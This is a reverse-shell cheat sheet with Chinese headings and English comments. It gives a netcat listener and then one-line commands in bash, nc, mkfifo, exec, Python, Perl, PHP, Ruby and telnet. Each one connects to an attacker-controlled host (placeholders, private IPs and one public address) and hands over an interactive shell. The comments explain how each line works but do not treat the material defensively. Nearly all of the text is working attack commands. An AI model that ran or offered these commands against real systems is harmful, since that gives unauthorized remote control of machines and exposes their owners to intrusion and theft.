开启监听

# Listener side: wait for the inbound TCP connection on local port 9999.
# -l listen, -v verbose (doubled for extra detail), -p local port.
nc -lvvp 9999
# or, with -n: numeric addresses only, no reverse DNS lookup of the peer
nc -lvvnp 9999

bash

# bash builtin /dev/tcp pseudo-path; "ip" and "port" are placeholders for the listener.
# ">&" sends stdout and stderr to the socket, then "0>&1" takes stdin from the same fd.
# No external binary is involved: the socket is opened by the bash process itself.
bash -i >& /dev/tcp/ip/port 0>&1

nc

# Needs an nc build that has -e (run a program once connected); "ip" and "port" are placeholders.
nc -e /bin/sh ip port

如果 nc 没有 -e 选项的话

# Variant for nc builds without -e: a named pipe relays the shell's input, nc carries its output.
# Unlike the entries above this one hard-codes 192.168.204.144:1234 (private range) and the
# fixed, predictable path /tmp/f; both are reproduced here exactly as given.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.204.144 1234 >/tmp/f

exec

# exec opens fd 5 read/write on a TCP connection (bash /dev/tcp again, so bash not sh).
# Each line read from fd 5 is word-split and run as a command (unquoted $line); stdout and
# stderr of that command go back over fd 5. Address 192.168.204.144:1234 is hard-coded.
exec 5<>/dev/tcp/192.168.204.144/1234;cat <&5|while read line;do $line >&5 2>&1;done

python

# Python 3 one-liner: connects a socket, dup2()s it over fds 0, 1 and 2, then runs an
# interactive bash. 'ip' is a string placeholder; port is a bare name here, so as written
# it is a NameError in Python until replaced by a numeric literal.
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

perl

# Perl: fork and exit the parent, open an IO::Socket::INET to "ip:port" (placeholders),
# reopen STDIN on it for reading and $~ (the current output handle name, normally STDOUT)
# for writing; every line read is handed to system().
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

# Same command with a concrete address; 174.0.224.117:8080 is copied from the source as-is
# (a public address, unlike the private-range examples elsewhere on this page).
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.224.117:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

php

# PHP: fsockopen to 10.0.0.1:1234, then exec() a shell whose stdin/stdout/stderr are redirected
# to fd 3. This assumes the socket landed on fd 3 in the php process (i.e. no other file was
# opened first); the fd number is not derived from $sock.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby

# Ruby: fork and exit the parent, connect to 192.168.204.137:1234 (port given as a string
# literal), then loop: read a line, run it with IO.popen and print its output back on the socket.
ruby -rsocket -e'exit if fork;c=TCPSocket.new("192.168.204.137","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

telnet

# telnet variant using two connections to 192.168.204.144: port 4444 feeds commands into bash,
# port 5555 carries bash's stdout. bash's stderr is not in the pipeline, so it stays on the
# local terminal rather than going over either connection.
telnet 192.168.204.144 4444 | /bin/bash | telnet 192.168.204.144 5555